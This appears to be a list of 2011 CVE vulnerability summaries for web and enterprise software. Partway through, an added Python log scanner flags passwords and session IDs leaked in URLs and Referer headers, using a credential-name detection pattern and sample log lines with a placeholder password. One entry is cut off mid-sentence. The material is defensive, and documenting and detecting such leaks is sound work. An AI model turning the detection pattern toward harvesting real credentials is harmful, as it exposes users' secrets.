[CVE-2011-2107] Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 10.3.181.22 on Windows, Mac OS X, Linux, and Solaris, and 10.3.185.22 and earlier on Android, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, related to a "universal cross-site scripting vulnerability."
[CVE-2011-2089] Stack-based buffer overflow in the SetActiveXGUID method in the VersionInfo ActiveX control in GenVersion.dll 8.0.138.0 in the WebHMI subsystem in ICONICS BizViz 9.x before 9.22 and GENESIS32 9.x before 9.22 allows remote attackers to execute arbitrary code via a long string in the argument. NOTE: some of these details are obtained from third party information.
[CVE-2011-2088] XWork 2.2.1 in Apache Struts 2.2.1, and OpenSymphony XWork in OpenSymphony WebWork, allows remote attackers to obtain potentially sensitive information about internal Java class paths via vectors involving an s:submit element and a nonexistent method, a different vulnerability than CVE-2011-1772.
[CVE-2011-2087] Multiple cross-site scripting (XSS) vulnerabilities in component handlers in the javatemplates (aka Java Templates) plugin in Apache Struts 2.x before 2.2.3 allow remote attackers to inject arbitrary web script or HTML via an arbitrary parameter value to a .action URI, related to improper handling of value attributes in (1) FileHandler.java, (2) HiddenHandler.java, (3) PasswordHandler.java, (4) RadioHandler.java, (5) ResetHandler.java, (6) SelectHandler.java, (7) SubmitHandler.java, and (8) TextFieldHandler.java.
[CVE-2011-2083] Multiple cross-site scripting (XSS) vulnerabilities in Best Practical Solutions RT 3.x before 3.8.12 and 4.x before 4.0.6 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-2077] The default configuration of the New Atlanta BlueDragon administrative interface in MediaCAST 8 and earlier enables external TCP connections to port 10000, instead of connections only from 127.0.0.1, which makes it easier for remote attackers to have an unspecified impact via a TCP session.
[CVE-2011-2060] The platform-sw component on Cisco Adaptive Security Appliances (ASA) 5500 series devices with software 8.2 before 8.2(5.3), 8.3 before 8.3(2.20), and 8.4 before 8.4(2.1) does not properly handle non-ASCII characters in an interface description, which allows local users to cause a denial of service (reload without configuration) via a crafted description, aka Bug ID CSCtq50523.
[CVE-2011-2041] The Start Before Logon (SBL) functionality in Cisco AnyConnect Secure Mobility Client (formerly AnyConnect VPN Client) before 2.3.254 on Windows, and on Windows Mobile, allows local users to gain privileges via unspecified user-interface interaction, aka Bug ID CSCta40556.
[CVE-2011-2039] The helper application in Cisco AnyConnect Secure Mobility Client (formerly AnyConnect VPN Client) before 2.3.185 on Windows, and on Windows Mobile, downloads a client executable file (vpndownloader.exe) without verifying its authenticity, which allows remote attackers to execute arbitrary code via the url property to a certain ActiveX control in vpnweb.ocx, aka Bug ID CSCsy00904.
[CVE-2011-2023] Cross-site scripting (XSS) vulnerability in functions/mime.php in SquirrelMail before 1.4.22 allows remote attackers to inject arbitrary web script or HTML via a crafted STYLE element in an e-mail message.
[CVE-2011-2021] Session fixation vulnerability in TIBCO iProcess Engine before 11.1.3 and iProcess Workspace before 11.3.1 allows remote attackers to hijack web sessions via unspecified vectors.
[CVE-2011-2020] Cross-site scripting (XSS) vulnerability in TIBCO iProcess Engine before 11.1.3 and iProcess Workspace before 11.3.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-1984] WINS in Microsoft Windows Server 2003 SP2 and Server 2008 SP2, R2, and R2 SP1 allows local users to gain privileges by sending crafted packets over the loopback interface, aka "WINS Local Elevation of Privilege Vulnerability."
[CVE-2011-1976] Cross-site scripting (XSS) vulnerability in the Report Viewer Control in Microsoft Visual Studio 2005 SP1 and Report Viewer 2005 SP1 allows remote attackers to inject arbitrary web script or HTML via a parameter in a data source, aka "Report Viewer Controls XSS Vulnerability."
[CVE-2011-1965] Tcpip.sys in the TCP/IP stack in Microsoft Windows 7 Gold and SP1 and Windows Server 2008 R2 and R2 SP1 does not properly implement URL-based QoS, which allows remote attackers to cause a denial of service (reboot) via a crafted URL to a web server, aka "TCP/IP QOS Denial of Service Vulnerability."
[CVE-2011-1962] Microsoft Internet Explorer 6 through 9 does not properly handle unspecified character sequences, which allows remote attackers to read content from a different (1) domain or (2) zone via a crafted web site that triggers "inactive filtering," aka "Shift JIS Character Encoding Vulnerability."
[CVE-2011-1961] The telnet URI handler in Microsoft Internet Explorer 6 through 9 does not properly launch the handler application, which allows remote attackers to execute arbitrary programs via a crafted web site, aka "Telnet Handler Remote Code Execution Vulnerability."
[CVE-2011-1954] Multiple cross-site request forgery (CSRF) vulnerabilities in Post Revolution 0.8.0c-2 and earlier allow remote attackers to hijack the authentication of arbitrary users for requests to (1) ajax-weblog-guardar.php, (2) verpost.php, (3) comments.php, or (4) perfil.php.
[CVE-2011-1953] Multiple cross-site scripting (XSS) vulnerabilities in common.php in Post Revolution before 0.8.0c-2 allow remote attackers to inject arbitrary web script or HTML via an attribute of a (1) P, a (2) STRONG, a (3) A, a (4) EM, a (5) I, a (6) IMG, a (7) LI, an (8) OL, a (9) VIDEO, or a (10) BLOCKQUOTE element.
[CVE-2011-1949] Cross-site scripting (XSS) vulnerability in the safe_html filter in Products.PortalTransforms in Plone 2.1 through 4.1 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2010-2422.
[CVE-2011-1948] Cross-site scripting (XSS) vulnerability in Plone 4.1 and earlier allows remote attackers to inject arbitrary web script or HTML via a crafted URL.
[CVE-2011-1941] Open redirect vulnerability in the redirector feature in phpMyAdmin 3.4.x before 3.4.1 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
[CVE-2011-1940] Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 3.3.x before 3.3.10.1 and 3.4.x before 3.4.1 allow remote attackers to inject arbitrary web script or HTML via a crafted table name that triggers improper HTML rendering on a Tracking page, related to (1) libraries/tbl_links.inc.php and (2) tbl_tracking.php.
[CVE-2011-1937] Cross-site scripting (XSS) vulnerability in Webmin 1.540 and earlier allows local users to inject arbitrary web script or HTML via a chfn command that changes the real (aka Full Name) field, related to useradmin/index.cgi and useradmin/user-lib.pl.
[CVE-2011-1928] The fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library 1.4.3 and 1.4.4, and the Apache HTTP Server 2.2.18, allows remote attackers to cause a denial of service (infinite loop) via a URI that does not match unspecified types of wildcard patterns, as demonstrated by attacks against mod_autoindex in httpd when a /*/WEB-INF/ configuration pattern is used. NOTE: this issue exists because of an incorrect fix for CVE-2011-0419.
[CVE-2011-1922] daemon/worker.c in Unbound 1.x before 1.4.10, when debugging functionality and the interface-automatic option are enabled, allows remote attackers to cause a denial of service (assertion failure and daemon exit) via a crafted DNS request that triggers improper error handling.
[CVE-2011-1906] Trustwave WebDefend Enterprise before 5.0 7.01.903-1.4 stores specific user-account credentials in a MySQL database, which makes it easier for remote attackers to read the event collection table via requests to the management port, a different vulnerability than CVE-2011-0756.
[CVE-2011-1900] Directory traversal vulnerability in NTWebServer in InduSoft Web Studio 6.1 and 7.x before 7.0+Patch 1 allows remote attackers to execute arbitrary code via an invalid request.
[CVE-2011-1899] Multiple cross-site scripting (XSS) vulnerabilities in CA eHealth 6.0.x, 6.1.x, 6.2.1, and 6.2.2 allow remote attackers to inject arbitrary web script or HTML via unspecified parameters.
[CVE-2011-1897] Cross-site scripting (XSS) vulnerability in Microsoft Forefront Unified Access Gateway (UAG) 2010 Gold, Update 1, Update 2, and SP1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Default Reflected XSS Vulnerability."
[CVE-2011-1896] Cross-site scripting (XSS) vulnerability in Microsoft Forefront Unified Access Gateway (UAG) 2010 Gold, Update 1, Update 2, and SP1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "ExcelTable Reflected XSS Vulnerability."
[CVE-2011-1894] The MHTML protocol handler in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle a MIME format in a request for embedded content in an HTML document, which allows remote attackers to conduct cross-site scripting (XSS) attacks via a crafted EMBED element in a web page that is visited in Internet Explorer, aka "MHTML Mime-Formatted Request Vulnerability."
[CVE-2011-1893] Cross-site scripting (XSS) vulnerability in Microsoft Office SharePoint Server 2010, Windows SharePoint Services 2.0 and 3.0 SP2, and SharePoint Foundation 2010 allows remote attackers to inject arbitrary web script or HTML via the URI, aka "SharePoint XSS Vulnerability."
[CVE-2011-1892] Microsoft Office Groove 2007 SP2, SharePoint Workspace 2010 Gold and SP1, Office Forms Server 2007 SP2, Office SharePoint Server 2007 SP2, Office SharePoint Server 2010 Gold and SP1, Office Groove Data Bridge Server 2007 SP2, Office Groove Management Server 2007 SP2, Groove Server 2010 Gold and SP1, Windows SharePoint Services 3.0 SP2, SharePoint Foundation 2010, and Office Web Apps 2010 Gold and SP1 do not properly handle Web Parts containing XML classes referencing external entities, which allows remote authenticated users to read arbitrary files via a crafted XML and XSL file, aka "SharePoint Remote File Disclosure Vulnerability."
[CVE-2011-1891] Cross-site scripting (XSS) vulnerability in Microsoft Windows SharePoint Services 3.0 SP2, and SharePoint Foundation 2010 Gold and SP1, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters in a request to a script, aka "Contact Details Reflected XSS Vulnerability."
[CVE-2011-1890] Cross-site scripting (XSS) vulnerability in EditForm.aspx in Microsoft Office SharePoint Server 2010 and SharePoint Foundation 2010 allows remote attackers to inject arbitrary web script or HTML via a post, aka "Editform Script Injection Vulnerability."
[CVE-2011-1862] Cross-site scripting (XSS) vulnerability in HP Service Manager 7.02, 7.11, 9.20, and 9.21 and Service Center 6.2.8 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-1856] Cross-site scripting (XSS) vulnerability in HP Business Availability Center (BAC) 8.06 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-1841] Cross-site scripting (XSS) vulnerability in the link_to helper in Mojolicious before 1.12 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-1839] IBM Rational Build Forge 7.1.0 uses the HTTP GET method during redirection from the authentication servlet to a PHP script, which makes it easier for context-dependent attackers to discover session IDs by reading (1) web-server access logs, (2) web-server Referer logs, or (3) the browser history.
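Credentials in a query string (CVE-2011-2153), external links carrying query strings into other sites' Referer logs (CVE-2011-2152) and session IDs passed through a GET redirect (CVE-2011-1839) all leave the same evidence: sensitive parameter names in access logs, either in the request line or in the Referer field. This added example (not code from the vulscan database or from any of the products above) scans combined-format log lines for both. The log lines, the log format and the list of parameter names to flag are constructed for the example; only txtUser and txtPass come from the CVE-2011-2153 text.

```python
# Added example (not from the vulscan database, SmarterStats or Build Forge): scan access
# logs for credentials or session identifiers carried in query strings, in the request line
# or in the Referer header. Sample lines and the name list are constructed for the example.
import re
from urllib.parse import parse_qsl, urlsplit

# Combined log format with Referer and User-Agent (assumed format).
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Parameter names that should never travel in a URL (assumed list; extend per application).
SENSITIVE_NAME = re.compile(r"pass|pwd|user|login|session|sid|token|auth", re.IGNORECASE)


def sensitive_params(url):
    """Names of query-string parameters in url that match SENSITIVE_NAME."""
    query = urlsplit(url).query
    return [name for name, _ in parse_qsl(query, keep_blank_values=True)
            if SENSITIVE_NAME.search(name)]


def scan_access_log(lines):
    """Return (client ip, where, parameter) for every sensitive parameter in a request URL
    or in a Referer header (the cross-domain Referer leakage case)."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue                       # not in the expected format; skip, do not guess
        for name in sensitive_params(m["target"]):
            findings.append((m["ip"], "request", name))
        if m["referer"] not in ("", "-"):
            for name in sensitive_params(m["referer"]):
                findings.append((m["ip"], "referer", name))
    return findings


SAMPLE_LOG = [
    # Login submitted with GET: credentials land in this server's own access log.
    '203.0.113.5 - - [10/May/2011:12:00:01 +0000] "GET /Login.aspx?txtUser=admin&txtPass=s3cret HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    # Benign request: a non-sensitive parameter is not flagged.
    '203.0.113.5 - - [10/May/2011:12:00:02 +0000] "GET /Client/frmViewReports.aspx?SiteID=42 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    # Line from a third-party server: the Referer carries a session id from a GET redirect.
    '198.51.100.7 - - [10/May/2011:12:00:03 +0000] "GET /docs/index.html HTTP/1.1" 200 1024 "http://app.example.test/start.php?sessionid=9f3c2a" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```

The referer findings are the ones an application owner cannot see in their own logs: they show up only on the third-party server the external link points to, which is exactly why these entries treat Referer leakage as a disclosure rather than a logging nuisance.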
[CVE-2011-1838] Multiple cross-site scripting (XSS) vulnerabilities in TemplateLogin.pm in TWiki before 5.0.2 allow remote attackers to inject arbitrary web script or HTML via the origurl parameter to a (1) view script or (2) login script.
[CVE-2011-1826] Open redirect vulnerability in the Administrative Console in CA Arcot WebFort Versatile Authentication Server (VAS) before 6.2.5 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
[CVE-2011-1825] Multiple cross-site scripting (XSS) vulnerabilities in the Administrative Console in CA Arcot WebFort Versatile Authentication Server (VAS) before 6.2.5 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-1804] rendering/RenderBox.cpp in WebCore in WebKit before r86862, as used in Google Chrome before 11.0.696.71, does not properly render floats, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that lead to a "stale pointer."
[CVE-2011-1800] Multiple integer overflows in the SVG Filters implementation in WebCore in WebKit in Google Chrome before 11.0.696.68 allow remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
[CVE-2011-1799] Google Chrome before 11.0.696.68 does not properly perform casts of variables during interaction with the WebKit engine, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
[CVE-2011-1797] WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1.
[CVE-2011-1776] The is_gpt_valid function in fs/partitions/efi.c in the Linux kernel before 2.6.39 does not check the size of an Extensible Firmware Interface (EFI) GUID Partition Table (GPT) entry, which allows physically proximate attackers to cause a denial of service (heap-based buffer overflow and OOPS) or obtain sensitive information from kernel heap memory by connecting a crafted GPT storage device, a different vulnerability than CVE-2011-1577.
[CVE-2011-1774] WebKit in Apple Safari before 5.0.6 has improper libxslt security settings, which allows remote attackers to create arbitrary files, and consequently execute arbitrary code, via a crafted web site. NOTE: this may overlap CVE-2011-1425.
[CVE-2011-1772] Multiple cross-site scripting (XSS) vulnerabilities in XWork in Apache Struts 2.x before 2.2.3, and OpenSymphony XWork in OpenSymphony WebWork, allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) an action name, (2) the action attribute of an s:submit element, or (3) the method attribute of an s:submit element.
[CVE-2011-1765] Cross-site scripting (XSS) vulnerability in MediaWiki before 1.16.5, when Internet Explorer 6 or earlier is used, allows remote attackers to inject arbitrary web script or HTML via an uploaded file accessed with a dangerous extension such as .shtml at the end of the query string, in conjunction with a modified URI path that has a %2E sequence in place of the . (dot) character. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1578 and CVE-2011-1587.
[CVE-2011-1752] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.17, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request for a baselined WebDAV resource, as exploited in the wild in May 2011.
[CVE-2011-1744] EMC Captiva eInput 2.1.1 before 2.1.1.37 does not restrict the origin of calls to ActiveX functions, which allows remote attackers to read arbitrary files or cause a denial of service via a crafted web site.
[CVE-2011-1743] Cross-site scripting (XSS) vulnerability in EMC Captiva eInput 2.1.1 before 2.1.1.37 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-1738] HP Palm webOS 1.4.5 and 1.4.5.1 does not properly restrict Plug-in Development Kit (PDK) applications, which allows local users to gain privileges by leveraging unintended filesystem write access.
[CVE-2011-1737] Multiple cross-site scripting (XSS) vulnerabilities in the Email application in HP Palm webOS 1.4.5 and 1.4.5.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-1727] Cross-site scripting (XSS) vulnerability in HP SiteScope 9.54, 10.13, 11.01, and 11.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, related to an "HTML injection" issue.
[CVE-2011-1726] Cross-site scripting (XSS) vulnerability in HP SiteScope 9.54, 10.13, 11.01, and 11.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-1723] Cross-site scripting (XSS) vulnerability in app/views/layouts/base.rhtml in Redmine 1.0.1 through 1.1.1 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to projects/hg-helloworld/news/. NOTE: some of these details are obtained from third party information.
[CVE-2011-1721] Cross-site request forgery (CSRF) vulnerability in php/partie_administrateur/administration.php in WebJaxe 1.02 allows remote attackers to hijack the authentication of administrators for requests that (1) modify passwords or (2) add new projects. NOTE: some of these details are obtained from third party information.
[CVE-2011-1719] Multiple stack-based buffer overflows in the Web Viewer ActiveX controls in CA Output Management Web Viewer 11.0 and 11.5 allow remote attackers to execute arbitrary code via (1) a long SRC property value to the PPSViewer ActiveX control in PPSView.ocx before 1.0.0.7 or (2) a long Title property value to the UOMWV_Helper ActiveX control in UOMWV_HelperActiveX.ocx before 11.5.0.1.
[CVE-2011-1718] The Web Agents component in CA SiteMinder R6 before SP6 CR2 and R12 before SP3 CR2 does not properly handle multi-line headers, which allows remote authenticated users to conduct impersonation attacks and gain privileges via crafted data.
[CVE-2011-1716] Multiple cross-site scripting (XSS) vulnerabilities in the Web UI in Xymon before 4.3.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-1714] Cross-site scripting (XSS) vulnerability in framework/source/resource/qx/test/jsonp_primitive.php in QooxDoo 1.3 and possibly other versions, as used in eyeOS 2.2 and 2.3, and possibly other products allows remote attackers to inject arbitrary web script or HTML via the callback parameter.
[CVE-2011-1709] GNOME Display Manager (gdm) before 2.32.2, when glib 2.28 is used, enables execution of a web browser with the uid of the gdm account, which allows local users to gain privileges via vectors involving the x-scheme-handler/http MIME type.
[CVE-2011-1696] Cross-site scripting (XSS) vulnerability in Novell Identity Manager (aka IDM) User Application 3.5.0, 3.5.1, 3.6.0, 3.6.1, 3.7.0, and 4.0.0, and Identity Manager Roles Based Provisioning Module 3.6.0, 3.6.1, 3.7.0, and 4.0.0, allows remote attackers to inject arbitrary web script or HTML via the apwaDetail (aka apwaDetailId) parameter, aka Bug 692972.
[CVE-2011-1691] The counterToCSSValue function in CSSComputedStyleDeclaration.cpp in the Cascading Style Sheets (CSS) implementation in WebCore in WebKit before r82222, as used in Google Chrome before 11.0.696.43 and other products, does not properly handle access to the (1) counterIncrement and (2) counterReset attributes of CSSStyleDeclaration data provided by a getComputedStyle method call, which allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via crafted JavaScript code.
[CVE-2011-1689] Multiple cross-site scripting (XSS) vulnerabilities in Best Practical Solutions RT 2.0.0 through 3.6.10, 3.8.0 through 3.8.9, and 4.0.0rc through 4.0.0rc7 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-1687] Best Practical Solutions RT 3.0.0 through 3.6.10, 3.8.0 through 3.8.9, and 4.0.0rc through 4.0.0rc7 allows remote authenticated users to obtain sensitive information by using the search interface, as demonstrated by retrieving encrypted passwords.
[CVE-2011-1683] IBM WebSphere Application Server (WAS) 6.0.x through 6.0.2.43, 6.1.x before 6.1.0.37, and 7.0.x before 7.0.0.17 on z/OS, when a Local OS user registry or Federated Repository with RACF adapter is used, allows remote attackers to obtain unspecified application access via unknown vectors.
[CVE-2011-1671] Cross-site scripting (XSS) vulnerability in app/controllers/todos_controller.rb in Tracks 1.7.2, 2.0RC2, and 2.0devel allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to todos/tag/. NOTE: some of these details are obtained from third party information.
[CVE-2011-1670] Cross-site scripting (XSS) vulnerability in actions/add.php in InTerra Blog Machine 1.84, and possibly earlier versions, allows remote attackers to inject arbitrary web script or HTML via the subject parameter to post_url/edit.
[CVE-2011-1668] Cross-site scripting (XSS) vulnerability in search.php in AR Web Content Manager (AWCM) 2.1, 2.2, and possibly other versions allows remote attackers to inject arbitrary web script or HTML via the search parameter.
[CVE-2011-1665] PHPBoost 3.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain backup SQL files via a direct request for predictable filenames in cache/backup/.
[CVE-2011-1662] Cross-site scripting (XSS) vulnerability in Translation Management module 6.x before 6.x-1.21 for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-1660] Multiple cross-site scripting (XSS) vulnerabilities in the DataDynamics.Reports.Web class library in GrapeCity Data Dynamics Reports before 1.6.2084.14 allow remote attackers to inject arbitrary web script or HTML via (1) the reportName or (2) uniqueId parameter to CoreViewerInit.js, or the (3) uniqueId or (4) traceLevel parameter to CoreController.js, as reachable by CoreHandler.ashx.
[CVE-2011-1655] The management.asmx module in the Management Web Service in the Unified Network Control (UNC) Server in CA Total Defense (TD) r12 before SE2 sends a cleartext response to unspecified getDBConfigSettings requests, which makes it easier for remote attackers to obtain database credentials, and subsequently execute arbitrary code, by sniffing the network, related to the UNCWS Web Service.
[CVE-2011-1654] Directory traversal vulnerability in the Heartbeat Web Service in CA.Itm.Server.ManagementWS.dll in the Management Server in CA Total Defense (TD) r12 before SE2 allows remote attackers to execute arbitrary code via directory traversal sequences in the GUID parameter in an upload request to FileUploadHandler.ashx.
[CVE-2011-1651] Cisco IOS XR 3.9.x and 4.0.x before 4.0.3 and 4.1.x before 4.1.1, when an SPA interface processor is installed, allows remote attackers to cause a denial of service (device reload) via a crafted IPv4 packet, aka Bug ID CSCto45095.
[CVE-2011-1649] The Internet Streamer application in Cisco Content Delivery System (CDS) with software 2.5.7, 2.5.8, and 2.5.9 before build 126 allows remote attackers to cause a denial of service (Web Engine crash) via a crafted URL, aka Bug IDs CSCtg67333 and CSCth25341.
[CVE-2011-1643] Cisco Unified Communications Manager (aka CUCM, formerly CallManager) 6.x, 7.x before 7.1(5b)su4, 8.0, and 8.5 before 8.5(1)su2 and Cisco Unified Presence Server 6.x, 7.x, 8.0, and 8.5 before 8.5xnr allow remote attackers to read database data by connecting to a query interface through an SSL session, aka Bug IDs CSCti81574, CSCto63060, CSCto72183, and CSCto73833.
[CVE-2011-1599] manager.c in the Manager Interface in Asterisk Open Source 1.4.x before 1.4.40.1, 1.6.1.x before 1.6.1.25, 1.6.2.x before 1.6.2.17.3, and 1.8.x before 1.8.3.3 and Asterisk Business Edition C.x.x before C.3.6.4 does not properly check for the system privilege, which allows remote authenticated users to execute arbitrary commands via an Originate action that has an Async header in conjunction with an Application header.
[CVE-2011-1587] Cross-site scripting (XSS) vulnerability in MediaWiki before 1.16.4, when Internet Explorer 6 or earlier is used, allows remote attackers to inject arbitrary web script or HTML via an uploaded file accessed with a dangerous extension such as .html located before a ? (question mark) in a query string, in conjunction with a modified URI path that has a %2E sequence in place of the . (dot) character. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1578.
[CVE-2011-1578] Cross-site scripting (XSS) vulnerability in MediaWiki before 1.16.3, when Internet Explorer 6 or earlier is used, allows remote attackers to inject arbitrary web script or HTML via an uploaded file accessed with a dangerous extension such as .html at the end of the query string, in conjunction with a modified URI path that has a %2E sequence in place of the . (dot) character.
[CVE-2011-1570] Cross-site scripting (XSS) vulnerability in Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to inject arbitrary web script or HTML via a message title, a different vulnerability than CVE-2004-2030.
[CVE-2011-1569] download.aspx in Douran Portal 3.9.7.8 allows remote attackers to obtain source code of arbitrary files under the web root via (1) a trailing ".", (2) a trailing space, or (3) mixed case in the FileNameAttach parameter.
[CVE-2011-1551] SUSE openSUSE Factory assigns ownership of the /var/log/cobbler/ directory tree to the web-service user account, which might allow local users to gain privileges by leveraging access to this account during root filesystem operations by the Cobbler daemon.
[CVE-2011-1542] Cross-site scripting (XSS) vulnerability in HP Systems Insight Manager (SIM) before 6.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-1538] Open redirect vulnerability in HP Proliant Support Pack (PSP) before 8.7 allows remote authenticated users to redirect other users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
[CVE-2011-1537] Cross-site scripting (XSS) vulnerability in HP Proliant Support Pack (PSP) before 8.7 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-1531] The webscan component in the Embedded Web Server (EWS) on the HP Photosmart D110 and B110
[CVE-2011-1524] Cross-site scripting (XSS) vulnerability in the management login GUI page in Symantec LiveUpdate Administrator (LUA) before 2.3 allows remote attackers to inject arbitrary web script or HTML via the username field, as demonstrated by injecting an IFRAME element into the event log, a different vulnerability than CVE-2011-0545.
[CVE-2011-1523] Cross-site scripting (XSS) vulnerability in statusmap.c in statusmap.cgi in Nagios 3.2.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the layer parameter.
[CVE-2011-1518] Multiple cross-site scripting (XSS) vulnerabilities in Open Ticket Request System (OTRS) 2.4.x before 2.4.10 and 3.x before 3.0.7 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-1510] Cross-site scripting (XSS) vulnerability in SolutionSearch.do in ManageEngine ServiceDesk Plus (SDP) before 8012 allows remote attackers to inject arbitrary web script or HTML via the searchText parameter.
[CVE-2011-1507] Asterisk Open Source 1.4.x before 1.4.40.1, 1.6.1.x before 1.6.1.25, 1.6.2.x before 1.6.2.17.3, and 1.8.x before 1.8.3.3 and Asterisk Business Edition C.x.x before C.3.6.4 do not restrict the number of unauthenticated sessions to certain interfaces, which allows remote attackers to cause a denial of service (file descriptor exhaustion and disk space exhaustion) via a series of TCP connections.
[CVE-2011-1504] Cross-site scripting (XSS) vulnerability in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA allows remote authenticated users to inject arbitrary web script or HTML via a blog title.
[CVE-2011-1499] acl.c in Tinyproxy before 1.8.3, when an Allow configuration setting specifies a CIDR block, permits TCP connections from all IP addresses, which makes it easier for remote attackers to hide the origin of web traffic by leveraging the open HTTP proxy server.
[CVE-2011-1498] Apache HttpClient 4.x before 4.1.1 in Apache HttpComponents, when used with an authenticating proxy server, sends the Proxy-Authorization header to the origin server, which allows remote web servers to obtain sensitive information by logging this header.
[CVE-2011-1492] steps/utils/modcss.inc in Roundcube Webmail before 0.5.1 does not properly verify that a request is an expected request for an external Cascading Style Sheets (CSS) stylesheet, which allows remote authenticated users to trigger arbitrary outbound TCP connections from the server, and possibly obtain sensitive information, via a crafted request.
[CVE-2011-1491] The login form in Roundcube Webmail before 0.5.1 does not properly handle a correctly authenticated but unintended login attempt, which makes it easier for remote authenticated users to obtain sensitive information by arranging for a victim to login to the attacker's account and then compose an e-mail message, related to a "login CSRF" issue.
[CVE-2011-1481] Multiple cross-site scripting (XSS) vulnerabilities in Francisco Burzi PHP-Nuke 8.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) sender_name or (2) sender_email parameter in a Feedback action to modules.php.
[CVE-2011-1462] WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1.
[CVE-2011-1457] WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1.
[CVE-2011-1453] WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1.
[CVE-2011-1449] Use-after-free vulnerability in the WebSockets implementation in Google Chrome before 11.0.696.57 allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
[CVE-2011-1433] The (1) AgentInterface and (2) CustomerInterface components in Open Ticket Request System (OTRS) before 3.0.6 place cleartext credentials into the session data in the database, which makes it easier for context-dependent attackers to obtain sensitive information by reading the _UserLogin and _UserPW fields.
[CVE-2011-1427] Multiple cross-site scripting (XSS) vulnerabilities in Kodak InSite 5.5.2 allow remote attackers to inject arbitrary web script or HTML via the (1) Language parameter to Pages/login.aspx, (2) HeaderWarning parameter to Troubleshooting/DiagnosticReport.asp, or (3) User-Agent header to troubleshooting/speedtest.asp.
[CVE-2011-1425] xslt.c in XML Security Library (aka xmlsec) before 1.2.17, as used in WebKit and other products, when XSLT is enabled, allows remote attackers to create or overwrite arbitrary files via vectors involving the libxslt output extension and a ds:Transform element during signature verification.
[CVE-2011-1424] The default configuration of ExShortcut\Web.config in EMC SourceOne Email Management before 6.6 SP1, when the Mobile Services component is used, does not properly set the localOnly attribute of the trace element, which allows remote authenticated users to obtain sensitive information via ASP.NET Application Tracing.
[CVE-2011-1423] Cross-site scripting (XSS) vulnerability in RSA Data Loss Prevention (DLP) Enterprise Manager 8.x before 8.5 SP1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
